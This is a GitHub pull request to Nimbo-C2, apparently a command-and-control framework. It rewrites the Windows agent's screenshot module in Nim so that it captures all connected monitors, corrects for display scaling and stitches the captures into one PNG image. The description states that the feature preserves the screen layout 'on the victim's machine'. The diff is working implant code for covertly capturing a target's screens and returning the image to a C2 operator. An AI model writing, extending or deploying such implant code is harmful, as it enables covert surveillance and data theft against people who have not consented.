### PR TITLE
added capability to capture all connected virtual monitors, with supp…

### DIFF
--- a/Nimbo-C2/agent/windows/utils/screenshot.nim
+++ b/Nimbo-C2/agent/windows/utils/screenshot.nim
@@ -1,54 +1,179 @@
-import pixie
-import winim
+import winim, pixie
 import winim/inc/windef
+when not defined(release):
+    import std/strformat
+
+type
+    MyPhysicalDimensions = object
+        w : int32
+        h : int32
+
+type
+    MyMonInfo = object
+        hMon : HMONITOR
+        hdcMon : HDC
+        rectLogical : windef.RECT
+        dimPhysical : MyPhysicalDimensions
+        scaleFactor : float64 #//DEVICE_SCALE_FACTOR unreliable
+        
+var virtMonitors: seq[MyMonInfo]
+
+when not defined(release):
+    proc PPrint(): void 
+proc EnumDisplayMonitorsCallback(hMon: HMONITOR,hdcMon: HDC,rectLogical: LPRECT,lparam: LPARAM): WINBOOL {.stdcall.}
+
+# ---------------------------------------------------------------------------------------
+        
+# DEBUG OUTPUT
+# - print monitor info
+when not defined(release):
+    proc PPrint(): void =
+        echo ""
+        echo &"""{"":<8}| {"scaleFactor":<12}| {"physical Dimensions":<20}| {"rect.left":<12}| {"rect.top":<12}| {"rect.right":<12}| {"rect.bottom":<12}"""
+        echo "----------------------------------------------------------------------------------------------------"
+
+        var cntr : int = 0
+        for mon in virtMonitors:
+            var formattedPhysicalDimensions = fmt"{mon.dimPhysical.w} x {mon.dimPhysical.h}"
+            var formattedLine = fmt"Disp {cntr}  | {mon.scaleFactor:<12}| {formattedPhysicalDimensions:<20}| {mon.rectLogical.left:<12}| {mon.rectLogical.top:<12}| {mon.rectLogical.right:<12}| {mon.rectLogical.bottom:<12}"
+            echo formattedLine
+            inc(cntr)
+        echo ""
+
+proc EnumDisplayMonitorsCallback(hMon: HMONITOR,hdcMon: HDC,rectLogical: LPRECT,lparam: LPARAM): WINBOOL {.stdcall.} =
+
+    # used to account for scaling ratio between the virtual resolution and real resolution
+    #[
+    var scale : DEVICE_SCALE_FACTOR
+    discard GetScaleFactorForMonitor(hMon, addr scale)
+    \-->    seems to be legacy winapi, which has not been updated with latest windows 
+            scaling/color modes. should not be relied on for anything more than boolean
+            "is scaled/virtualized?".
+    ]#
+
+    # acquiring physical width & height of the monitor, rather than virtual dimensions.
+    var miex : MONITORINFOEXA
+    miex.struct1.cbSize = DWORD sizeof(miex)
+    discard GetMonitorInfoA(hMon, cast[LPMONITORINFO](addr miex))
+
+    var dm : DEVMODEA
+    dm.dmSize = WORD sizeof(dm)
+    dm.dmDriverExtra = 0
+    discard EnumDisplaySettingsA(cast[LPCSTR](addr miex.szDevice), ENUM_CURRENT_SETTINGS, cast[LPDEVMODEA](addr dm))
+    var 
+        cxPhysical : int32 = dm.dmPelsWidth
+        cyPhysical : int32 = dm.dmPelsHeight
+
+    var tmpPhysicalDimensions : MyPhysicalDimensions
+    tmpPhysicalDimensions.w = cxPhysical
+    tmpPhysicalDimensions.h = cyPhysical
+
+    # calculate scale factor, knowing virtual and physical monitor dimensions.
+    # assuming square pixels, so vertical scale factor same as horizontal scale factor (:
+    var cxLogical = rectLogical.right - rectLogical.left
+    var scaleFactor : float64 = float64(cxPhysical) / float64(cxLogical) #float64 = nim's alternative to type 'double'
+
+    var tmpMyMonInfo : MyMonInfo
+    tmpMyMonInfo.hMon = hMon
+    tmpMyMonInfo.hdcMon = hdcMon
+    tmpMyMonInfo.rectLogical = rectLogical[]
+    tmpMyMonInfo.dimPhysical = tmpPhysicalDimensions
+    tmpMyMonInfo.scaleFactor = scaleFactor
+
+    virtMonitors.insert(tmpMyMonInfo)
+
+    return TRUE
+
+# ---------------------------------------------------------------------------------------
 
 proc get_screenshot*(): string =
 
-    # get size of the main screen
-    var screenRect: windef.Rect
-    GetClientRect GetDesktopWindow(), addr screenRect
-    let
-        x = screenRect.left
-        y = screenRect.top
-        w = (screenRect.right - screenRect.left)
-        h = (screenRect.bottom - screenRect.top)
+    # enumerating conencted virtual monitors
+    var hdc : HDC = 0               # If this parameter is NULL, the hdc parameter passed to the callback function will be NULL, and the visible region of interest is the virtual screen that encompasses all the displays on the desktop.
+    var lprcClip : LPRECT = nil     # If hdc is NULL, the coordinates are virtual-screen coordinates.
+    var lpfnEnum : MONITORENUMPROC = EnumDisplayMonitorsCallback    # callback
+    var dwData: LPARAM
 
-    # create an image
-    var image = newImage(w, h)
+    discard EnumDisplayMonitors(hdc, lprcClip, lpfnEnum, dwData)
+    #var retval = EnumDisplayMonitors(hdc, lprcClip, lpfnEnum, dwData)
+    #if retval == 0:
+    #    echo fmt"[!] ERROR in 'EnumDisplayMonitors' - ({GetLastError()})" 
 
-    # copy screen data to bitmap
+    # DEBUG OUTPUT
+    # - print monitor info
+    when not defined(release):
+        PPrint()
+
+    var hScreen = GetDC(cast[HWND](nil))
+
+    # combining screenshots into ONE 'virtual screen' final bitmap
+    # getting size of virtual screen (in pixels). The virtual screen is the bounding rectangle of all display monitors.
+    var 
+        nScreenWidth: int32  = GetSystemMetrics(SM_CXVIRTUALSCREEN)
+        nScreenHeight: int32 = GetSystemMetrics(SM_CYVIRTUALSCREEN)
+
+        hCaptureDC : HDC = CreateCompatibleDC(hScreen)
+        hBitmap = CreateCompatibleBitmap(hScreen, int32 nScreenWidth, int32 nScreenHeight)
+
+    discard SelectObject(hCaptureDC, hBitmap)
+
+    # calc coordinates for shifting of screenshots, each in relation to the others.
+    # for this, finding the leftmost/topmost coordinates
     var
-        hScreen = GetDC(cast[HWND](nil))
-        hDC = CreateCompatibleDC(hScreen)
-        hBitmap = CreateCompatibleBitmap(hScreen, int32 w, int32 h)
+        leftMost : int32 = 0
+        topMost  : int32 = 0
+    for mon in virtMonitors:
+        if mon.rectLogical.left < leftMost:
+            leftMost = mon.rectLogical.left
+        if mon.rectLogical.top < topMost:
+            topMost = mon.rectLogical.top
 
-    discard SelectObject(hDC, hBitmap)
-    discard BitBlt(hDC, 0, 0, int32 w, int32 h, hScreen, int32 x, int32 y, SRCCOPY)
+    # position all screenshots in the final bitmap
+    for idx, mon in virtMonitors:
+        var 
+            x :int32 = mon.rectLogical.left - leftMost
+            y :int32 = mon.rectLogical.top - topMost
+            cx :int32 = mon.dimPhysical.w #int32((mon.rectLogical.right - mon.rectLogical.left) * int32(mon.scaleFactor) / 100)
+            cy :int32 = mon.dimPhysical.h #int32((mon.rectLogical.bottom - mon.rectLogical.top) * int32(mon.scaleFactor) / 100)
+            x1 :int32 = mon.rectLogical.left
+            y1 :int32 = mon.rectLogical.top
+
+        discard BitBlt(hCaptureDC, x, y, cx, cy, hScreen#[mon.hdcMon]#, x1, y1, SRCCOPY)
 
     # setup bmi structure
     var mybmi: BITMAPINFO
     mybmi.bmiHeader.biSize = int32 sizeof(mybmi)
-    mybmi.bmiHeader.biWidth = w
-    mybmi.bmiHeader.biHeight = h
+    mybmi.bmiHeader.biWidth = nScreenWidth
+    mybmi.bmiHeader.biHeight = nScreenHeight
     mybmi.bmiHeader.biPlanes = 1
     mybmi.bmiHeader.biBitCount = 32
     mybmi.bmiHeader.biCompression = BI_RGB
-    mybmi.bmiHeader.biSizeImage = w * h * 4
+    mybmi.bmiHeader.biSizeImage = nScreenWidth * nScreenHeight * 4
+
+    # create an image
+    var finalImage = newImage(nScreenWidth, nScreenHeight)
 
     # copy data from bmi structure to the flippy image
-    discard CreateDIBSection(hdc, addr mybmi, DIB_RGB_COLORS, cast[ptr pointer](unsafeAddr image.data[0]), 0, 0)
-    discard GetDIBits(hdc, hBitmap, 0, h, cast[ptr pointer](unsafeAddr image.data[0]), addr mybmi, DIB_RGB_COLORS)
+    discard CreateDIBSection(hCaptureDC, addr mybmi, DIB_RGB_COLORS, cast[ptr pointer](unsafeAddr finalImage.data[0]), 0, 0)
+    discard GetDIBits(hCaptureDC, hBitmap, 0, nScreenHeight, cast[ptr pointer](unsafeAddr finalImage.data[0]), addr mybmi, DIB_RGB_COLORS)
 
     # for some reason windows bitmaps are flipped? flip it back
-    image.flipVertical()
+    finalImage.flipVertical()
 
     # for some reason windows uses BGR, convert it to RGB
-    for i in 0 ..< image.height * image.width:
-        swap image.data[i].r, image.data[i].b
+    for i in 0 ..< finalImage.height * finalImage.width:
+        swap finalImage.data[i].r, finalImage.data[i].b
 
     # delete data [they are not needed anymore]
-    DeleteObject hdc
+    DeleteObject hCaptureDC
     DeleteObject hBitmap
 
-    var image_stream = encodeImage(image, PngFormat)
-    return image_stream
+    # convert to more efficient image format
+    # Pixie does not support more size-efficient JPEG format
+
+    # DEBUG OUTPUT
+    when not defined(release):
+        finalImage.writeFile("combined_screenshot.png")
+    else:
+        var image_stream = encodeImage(finalImage, PngFormat)
+        return image_stream


### PR DESCRIPTION
## Pull Request: adding capability to capture all connected virtual monitors, with support for scaling and relative positioning of screens to each other.

This PR aims to enhance the screenshot feature of the windows agent - mainly, to capture all connected monitors, and also quality imporvements.

The changes included in this pull request are as follows:
- Enumeration and screen-capture of all connected virtual monitors.
- Support for correctly capturing monitors on which scaling is applied.
- Combining all screen-captures to one image - while preserving their relative positioning on the victim's machine.

### Example
Here is a sample output from running the new `screenshot` command on a windows agent:
![screenshot_30 04 2024_07 03 23](https://github.com/itaymigdal/Nimbo-C2/assets/23000512/1ae9e1b7-cd20-4fdd-bc15-b6c7ae66dcd6)
